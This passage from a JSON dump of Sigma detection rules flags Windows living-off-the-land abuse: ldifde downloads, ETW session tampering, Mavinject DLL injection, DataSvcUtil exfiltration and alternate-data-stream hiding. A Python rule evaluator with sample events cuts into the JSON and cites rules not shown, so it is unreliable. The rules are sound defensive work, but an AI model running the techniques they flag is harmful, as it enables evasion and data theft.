    "content": "title: Import LDAP Data Interchange Format File Via Ldifde.EXE\nid: 6f535e01-ca1f-40be-ab8d-45b19c0c8b7f\nstatus: test\ndescription: |\n    Detects the execution of \"Ldifde.exe\" with the import flag \"-i\". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.\nreferences:\n    - https://twitter.com/0gtweet/status/1564968845726580736\n    - https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)\nauthor: '@gott_cyber'\ndate: 2022-09-02\nmodified: 2023-03-14\ntags:\n    - attack.command-and-control\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\ldifde.exe'\n        - OriginalFileName: 'ldifde.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '-i'\n            - '-f'\n    condition: all of selection_*\nfalsepositives:\n    - Since the content of the files are unknown, false positives are expected\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_link_uncommon_parent_process.yml",
    "content": "title: Uncommon Link.EXE Parent Process\nid: 6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6\nstatus: test\ndescription: |\n    Detects an uncommon parent process of \"LINK.EXE\".\n    Link.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation.\n    Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the \"LINK.EXE\" binary without checking its validity.\n    This would allow an attacker to sideload any binary with the name \"link.exe\" if one of the aforementioned tools get executed from a different location.\n    By filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious.\nreferences:\n    - https://twitter.com/0gtweet/status/1560732860935729152\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-22\nmodified: 2024-06-27\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\link.exe'\n        CommandLine|contains: 'LINK /' # Hardcoded command line when we call tools like dumpbin.exe, editbin.exe, lib.exe...etc\n    # Add other filters for other legitimate locations\n    filter_main_visual_studio:\n        ParentImage|startswith:\n            - 'C:\\Program Files\\Microsoft Visual Studio\\'\n            - 'C:\\Program Files (x86)\\Microsoft Visual Studio\\'\n        ParentImage|contains:\n            - '\\VC\\bin\\'\n            - '\\VC\\Tools\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml",
    "content": "title: Rebuild Performance Counter Values Via Lodctr.EXE\nid: cc9d3712-6310-4320-b2df-7cb408274d53\nstatus: test\ndescription: Detects the execution of \"lodctr.exe\" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-15\nmodified: 2024-03-05\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\lodctr.exe'\n        OriginalFileName: 'LODCTR.EXE'\n    selection_cli:\n        CommandLine|contains|windash: ' -r'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage by an administrator\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_logman_disable_eventlog.yml",
    "content": "title: Suspicious Windows Trace ETW Session Tamper Via Logman.EXE\nid: cd1f961e-0b96-436b-b7c6-38da4583ec00\nstatus: test\ndescription: Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions\nreferences:\n    - https://twitter.com/0gtweet/status/1359039665232306183?s=21\n    - https://ss64.com/nt/logman.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-02-11\nmodified: 2023-02-21\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\n    - attack.t1070.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\logman.exe'\n        - OriginalFileName: 'Logman.exe'\n    selection_action:\n        CommandLine|contains:\n            - 'stop '\n            - 'delete '\n    selection_service:\n        CommandLine|contains:\n            - 'Circular Kernel Context Logger'\n            - 'EventLog-' # Cover multiple traces starting with EventLog-*\n            - 'SYSMON TRACE'\n            - 'SysmonDnsEtwSession'\n    condition: all of selection*\nfalsepositives:\n    - Legitimate deactivation by administrative staff\n    - Installer tools that disable services, e.g. before log collection agent installation\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml",
    "content": "title: LOLBAS Data Exfiltration by DataSvcUtil.exe\nid: e290b10b-1023-4452-a4a9-eb31a9013b3a\nstatus: test\ndescription: Detects when a user performs data exfiltration by using DataSvcUtil.exe\nreferences:\n    - https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6\n    - https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe\n    - https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services\n    - https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services\n    - https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/\nauthor: Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger\ndate: 2021-09-30\nmodified: 2022-05-16\ntags:\n    - attack.exfiltration\n    - attack.t1567\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cli:\n        CommandLine|contains:\n            - '/in:'\n            - '/out:'\n            - '/uri:'\n    selection_img:\n        - Image|endswith: '\\DataSvcUtil.exe'\n        - OriginalFileName: 'DataSvcUtil.exe'\n    condition: all of selection*\nfalsepositives:\n    - DataSvcUtil.exe being used may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml",
    "content": "title: Devtoolslauncher.exe Executes Specified Binary\nid: cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6\nstatus: test\ndescription: The Devtoolslauncher.exe executes other binary\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/\n    - https://twitter.com/_felamos/status/1179811992841797632\nauthor: Beyu Denis, oscd.community (rule), @_felamos (idea)\ndate: 2019-10-12\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\devtoolslauncher.exe'\n        CommandLine|contains: 'LaunchForDeploy'\n    condition: selection\nfalsepositives:\n    - Legitimate use of devtoolslauncher.exe by legitimate user\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml",
    "content": "title: Suspicious Diantz Alternate Data Stream Execution\nid: 6b369ced-4b1d-48f1-b427-fdc0de0790bd\nstatus: test\ndescription: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Diantz/\nauthor: frack113\ndate: 2021-11-26\nmodified: 2022-12-31\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - diantz.exe\n            - .cab\n        CommandLine|re: ':[^\\\\]'\n    condition: selection\nfalsepositives:\n    - Very Possible\nlevel: medium\n"
  },
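The three rules whose detection sections are easiest to misread are the ones with a filter or a regular expression: "Shell Process Spawned by Java.EXE" (dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0, with its `filter_main_build` exclusion), "Suspicious Child Process Of Manage Engine ServiceDesk" (cea2b7ea-792b-405f-95a1-b903ea06458f, with `filter_main_net` excluding `net stop`) and "Suspicious Diantz Alternate Data Stream Execution" (6b369ced-4b1d-48f1-b427-fdc0de0790bd, with the `:[^\\]` regex). The following is an added example, not code from the Sigma repository or from any Sigma backend: a minimal evaluator that implements only the Sigma matching semantics those rules use (map keys ANDed, list values ORed unless the `all` modifier is present, case-insensitive `contains`/`startswith`/`endswith`, case-sensitive `re`, and the `selection and not 1 of filter_main_*` condition shape) and runs the three rules, hand-transcribed into Python dicts, over constructed Sysmon-style process-creation events. The event values and the rule dicts are assumptions made for the example; the ManageEngine `Image` list is shortened to the entries exercised.

```python
"""Mini Sigma evaluator for three rules on this page, run over constructed events.

Added example, not part of the Sigma repository. Implements only the subset of
Sigma matching the rules need: keys of a map are ANDed, list values are ORed
unless the ``all`` modifier is present, plain/contains/startswith/endswith
comparisons are case-insensitive, ``re`` is a case-sensitive regex search, and
the condition is ``selection and not 1 of filter_main_*`` (filters optional).
Rule dicts are hand-transcribed; event field names follow Sysmon Event ID 1.
"""
import re
from typing import Any


def _match_value(field_value: str, mods: list[str], pattern: str) -> bool:
    if "re" in mods:
        return re.search(pattern, field_value) is not None
    fv, p = field_value.lower(), pattern.lower()
    if "endswith" in mods:
        return fv.endswith(p)
    if "startswith" in mods:
        return fv.startswith(p)
    if "contains" in mods:
        return p in fv
    return fv == p


def _match_field(event: dict, key: str, value: Any) -> bool:
    name, *mods = key.split("|")
    fv = event.get(name)
    if fv is None:  # a missing field never matches
        return False
    patterns = value if isinstance(value, list) else [value]
    combine = all if "all" in mods else any
    return combine(_match_value(fv, mods, p) for p in patterns)


def _match_selection(event: dict, sel: Any) -> bool:
    if isinstance(sel, list):  # list of maps: OR
        return any(_match_selection(event, s) for s in sel)
    return all(_match_field(event, k, v) for k, v in sel.items())  # map: AND


def evaluate(rule: dict, event: dict) -> bool:
    """selection and not 1 of filter_main_* (no filters means selection alone)."""
    det = rule["detection"]
    if not _match_selection(event, det["selection"]):
        return False
    filters = [v for k, v in det.items() if k.startswith("filter_main_")]
    return not any(_match_selection(event, f) for f in filters)


JAVA_SHELL = {"detection": {
    "selection": {
        "ParentImage|endswith": "\\java.exe",
        "Image|endswith": ["\\bash.exe", "\\cmd.exe", "\\powershell.exe", "\\pwsh.exe"],
    },
    "filter_main_build": {"ParentImage|contains": "build", "CommandLine|contains": "build"},
}}

MANAGEENGINE = {"detection": {  # Image list shortened to the entries used below
    "selection": {
        "ParentImage|contains|all": ["\\ManageEngine\\ServiceDesk\\", "\\java.exe"],
        "Image|endswith": ["\\net.exe", "\\net1.exe", "\\powershell.exe", "\\whoami.exe"],
    },
    "filter_main_net": {"Image|endswith": ["\\net.exe", "\\net1.exe"], "CommandLine|contains": " stop"},
}}

DIANTZ_ADS = {"detection": {
    "selection": {"CommandLine|contains|all": ["diantz.exe", ".cab"], "CommandLine|re": r":[^\\]"},
}}

# Constructed events: (label, rule, event, expected verdict)
CASES = [
    ("java->cmd whoami", JAVA_SHELL, {
        "ParentImage": r"C:\Program Files\Java\jre1.8.0_301\bin\java.exe",
        "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"}, True),
    ("CI build agent (filtered)", JAVA_SHELL, {
        "ParentImage": r"C:\agent\build\tools\java.exe",
        "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c gradlew build"}, False),
    ("ServiceDesk java->whoami", MANAGEENGINE, {
        "ParentImage": r"C:\Program Files\ManageEngine\ServiceDesk\jre\bin\java.exe",
        "Image": r"C:\Windows\System32\whoami.exe", "CommandLine": "whoami /all"}, True),
    ("ServiceDesk net stop (filtered)", MANAGEENGINE, {
        "ParentImage": r"C:\Program Files\ManageEngine\ServiceDesk\jre\bin\java.exe",
        "Image": r"C:\Windows\System32\net.exe", "CommandLine": "net stop ServiceDesk"}, False),
    ("diantz to ADS", DIANTZ_ADS, {
        "CommandLine": r"diantz.exe c:\tools\file.exe c:\tools\file.exe:hidden.cab"}, True),
    ("diantz plain cab", DIANTZ_ADS, {
        "CommandLine": r"diantz.exe c:\tools\file.exe c:\tools\file.cab"}, False),
    # Caveat: a drive-relative path also satisfies ':[^\\]', hence the rule's false-positive note.
    ("diantz drive-relative path (FP)", DIANTZ_ADS, {
        "CommandLine": r"diantz.exe c:file.exe c:file.cab"}, True),
]


def run_cases() -> dict[str, bool]:
    """Return {label: verdict} for every constructed case."""
    return {label: evaluate(rule, ev) for label, rule, ev, _ in CASES}


if __name__ == "__main__":
    for label, rule, ev, expected in CASES:
        print(f"{'ALERT' if evaluate(rule, ev) else 'quiet'}  {label} (expected {expected})")
```

Two things the run makes visible that the YAML alone does not: the `filter_main_*` exclusions are evaluated after the selection, so the CI agent and the `net stop` events match the selection but are suppressed, and the ADS regex keys on "colon not followed by backslash", which is why a drive-relative path such as `c:file.cab` trips it. Real Sigma backends also honour wildcards in plain values and other modifiers; add those before reusing this on anything beyond the rules named above.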
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml",
    "content": "title: Suspicious Diantz Download and Compress Into a CAB File\nid: 185d7418-f250-42d0-b72e-0c8b70661e93\nstatus: test\ndescription: Download and compress a remote file and store it in a cab file on local machine.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Diantz/\nauthor: frack113\ndate: 2021-11-26\nmodified: 2022-08-13\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - diantz.exe\n            - ' \\\\\\\\'\n            - '.cab'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml",
    "content": "title: Suspicious Extrac32 Execution\nid: aa8e035d-7be4-48d3-a944-102aec04400d\nstatus: test\ndescription: Download or Copy file with Extrac32\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Extrac32/\nauthor: frack113\ndate: 2021-11-26\nmodified: 2022-08-13\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_lolbas:\n        - CommandLine|contains: extrac32.exe\n        - Image|endswith: '\\extrac32.exe'\n        - OriginalFileName: 'extrac32.exe'\n    selection_archive:\n        CommandLine|contains: '.cab'\n    selection_options:\n        CommandLine|contains:\n            - /C\n            - /Y\n            - ' \\\\\\\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml",
    "content": "title: Suspicious Extrac32 Alternate Data Stream Execution\nid: 4b13db67-0c45-40f1-aba8-66a1a7198a1e\nstatus: test\ndescription: Extract data from cab file and hide it in an alternate data stream\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Extrac32/\nauthor: frack113\ndate: 2021-11-26\nmodified: 2022-12-30\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - extrac32.exe\n            - .cab\n        CommandLine|re: ':[^\\\\]'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_gather_network_info.yml",
    "content": "title: Potential Reconnaissance Activity Via GatherNetworkInfo.VBS\nid: 575dce0c-8139-4e30-9295-1ee75969f7fe\nrelated:\n    - id: f92a6f1e-a512-4a15-9735-da09e78d7273 # FileCreate\n      type: similar\n    - id: 07aa184a-870d-413d-893a-157f317f6f58 # ProcCreation Susp\n      type: similar\nstatus: test\ndescription: Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine\nreferences:\n    - https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs\n    - https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\nauthor: blueteamer8699\ndate: 2022-01-03\nmodified: 2023-02-08\ntags:\n    - attack.discovery\n    - attack.execution\n    - attack.t1615\n    - attack.t1059.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\cscript.exe'\n              - '\\wscript.exe'\n        - OriginalFileName:\n              - 'cscript.exe'\n              - 'wscript.exe'\n    selection_cli:\n        CommandLine|contains: 'gatherNetworkInfo.vbs'\n    condition: all of selection_*\nfalsepositives:\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml",
    "content": "title: Gpscript Execution\nid: 1e59c230-6670-45bf-83b0-98903780607e\nstatus: test\ndescription: Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy\nreferences:\n    - https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/\n    - https://lolbas-project.github.io/lolbas/Binaries/Gpscript/\nauthor: frack113\ndate: 2022-05-16\nmodified: 2023-06-14\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\gpscript.exe'\n        - OriginalFileName: 'GPSCRIPT.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - ' /logon'\n            - ' /startup'\n    filter_main_svchost:\n        ParentCommandLine: 'C:\\windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate uses of logon scripts distributed via group policy\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml",
    "content": "title: Ie4uinit Lolbin Use From Invalid Path\nid: d3bf399f-b0cf-4250-8bb4-dfc192ab81dc\nstatus: test\ndescription: Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/\n    - https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/\nauthor: frack113\ndate: 2022-05-07\nmodified: 2022-05-16\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    lolbin:\n        - Image|endswith: '\\ie4uinit.exe'\n        - OriginalFileName: 'IE4UINIT.EXE'\n    filter_correct:\n        CurrentDirectory:\n            - 'c:\\windows\\system32\\'\n            - 'c:\\windows\\sysWOW64\\'\n    filter_missing:\n        CurrentDirectory: null\n    condition: lolbin and not 1 of filter_*\nfalsepositives:\n    - ViberPC updater calls this binary with the following commandline \"ie4uinit.exe -ClearIconCache\"\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml",
    "content": "title: Launch-VsDevShell.PS1 Proxy Execution\nid: 45d3a03d-f441-458c-8883-df101a3bb146\nstatus: test\ndescription: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.\nreferences:\n    - https://twitter.com/nas_bench/status/1535981653239255040\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-19\ntags:\n    - attack.defense-evasion\n    - attack.t1216.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_script:\n        CommandLine|contains: 'Launch-VsDevShell.ps1'\n    selection_flags:\n        CommandLine|contains:\n            - 'VsWherePath '\n            - 'VsInstallationPath '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of the script by a developer\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml",
    "content": "title: Potential Manage-bde.wsf Abuse To Proxy Execution\nid: c363385c-f75d-4753-a108-c1a8e28bdbda\nstatus: test\ndescription: Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution\nreferences:\n    - https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/\n    - https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712\n    - https://twitter.com/bohops/status/980659399495741441\n    - https://twitter.com/JohnLaTwC/status/1223292479270600706\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md\nauthor: oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-10-13\nmodified: 2023-02-03\ntags:\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_wscript_img:\n        - Image|endswith: '\\wscript.exe'\n        - OriginalFileName: 'wscript.exe'\n    selection_wscript_cli:\n        CommandLine|contains: 'manage-bde.wsf'\n    selection_parent:\n        ParentImage|endswith:\n            - '\\cscript.exe'\n            - '\\wscript.exe'\n        ParentCommandLine|contains: 'manage-bde.wsf'\n    selection_filter_cmd:\n        Image|endswith: '\\cmd.exe'\n    condition: all of selection_wscript_* or (selection_parent and not selection_filter_cmd)\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml",
    "content": "title: Mavinject Inject DLL Into Running Process\nid: 4f73421b-5a0b-4bbf-a892-5a7fb99bea66\nrelated:\n    - id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8\n      type: obsolete\nstatus: test\ndescription: Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md\n    - https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e\n    - https://twitter.com/gN3mes1s/status/941315826107510784\n    - https://reaqta.com/2017/12/mavinject-microsoft-injector/\n    - https://twitter.com/Hexacorn/status/776122138063409152  # Deleted tweet\n    - https://github.com/SigmaHQ/sigma/issues/3742\n    - https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection\nauthor: frack113, Florian Roth\ndate: 2021-07-12\nmodified: 2022-12-05\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055.001\n    - attack.t1218.013\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: ' /INJECTRUNNING '\n    filter:\n        ParentImage: 'C:\\Windows\\System32\\AppVClient.exe' # This parent is the expected process to launch \"mavinject\"\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_mpiexec.yml",
    "content": "title: MpiExec Lolbin\nid: 729ce0ea-5d8f-4769-9762-e35de441586d\nstatus: test\ndescription: Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary\nreferences:\n    - https://twitter.com/mrd0x/status/1465058133303246867\n    - https://learn.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-11\nmodified: 2024-11-23\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_binary:\n        - Image|endswith: '\\mpiexec.exe'\n        - Hashes|contains: 'IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217'\n    selection_flags:\n        CommandLine|contains:\n            - ' /n 1 '\n            - ' -n 1 '\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml",
    "content": "title: Execute Files with Msdeploy.exe\nid: 646bc99f-6682-4b47-a73a-17b1b64c9d34\nstatus: test\ndescription: Detects file execution using the msdeploy.exe lolbin\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/\n    - https://twitter.com/pabraeken/status/995837734379032576\n    - https://twitter.com/pabraeken/status/999090532839313408\nauthor: Beyu Denis, oscd.community\ndate: 2020-10-18\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'verb:sync'\n            - '-source:RunCommand'\n            - '-dest:runCommand'\n        Image|endswith: '\\msdeploy.exe'\n    condition: selection\nfalsepositives:\n    - System administrator Usage\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml",
    "content": "title: Use of OpenConsole\nid: 814c95cc-8192-4378-a70a-f1aafd877af1\nstatus: test\ndescription: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting\nreferences:\n    - https://twitter.com/nas_bench/status/1537563834478645252\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-16\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName: 'OpenConsole.exe'\n        - Image|endswith: '\\OpenConsole.exe'\n    filter:\n        Image|startswith: 'C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal' # We exclude the default path for WindowsTerminal\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate use by an administrator\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_openwith.yml",
    "content": "title: OpenWith.exe Executes Specified Binary\nid: cec8e918-30f7-4e2d-9bfa-a59cc97ae60f\nstatus: test\ndescription: Detects OpenWith.exe executing another binary\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml\n    - https://twitter.com/harr0ey/status/991670870384021504\nauthor: Beyu Denis, oscd.community (rule), @harr0ey (idea)\ndate: 2019-10-12\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\OpenWith.exe'\n        CommandLine|contains: '/c'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml",
    "content": "title: Use of Pcalua For Execution\nid: 0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2\nrelated:\n    - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02\n      type: obsolete\nstatus: test\ndescription: Detects execution of commands and binaries from the context of the Program Compatibility Assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Pcalua/\n    - https://pentestlab.blog/2020/07/06/indirect-command-execution/\nauthor: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community\ndate: 2022-06-14\nmodified: 2023-01-04\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\pcalua.exe'\n        CommandLine|contains: ' -a' # No space after the flag because it accepts anything as long as there is a \"-a\"\n    condition: selection\nfalsepositives:\n    - Legitimate use via a batch script or by an administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml",
    "content": "title: Indirect Command Execution By Program Compatibility Wizard\nid: b97cd4b1-30b8-4a9d-bd72-6293928d52bc\nstatus: test\ndescription: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe\nreferences:\n    - https://twitter.com/pabraeken/status/991335019833708544\n    - https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/\nauthor: A. Sungurov , oscd.community\ndate: 2020-10-12\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\pcwrun.exe'\n    condition: selection\nfalsepositives:\n    - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts\n    - Legit usage of scripts\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml",
    "content": "title: Execute Pcwrun.EXE To Leverage Follina\nid: 6004abd0-afa4-4557-ba90-49d172e0a299\nstatus: test\ndescription: Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability\nreferences:\n    - https://twitter.com/nas_bench/status/1535663791362519040\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\pcwrun.exe'\n        CommandLine|contains: '../'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_pcwutl.yml",
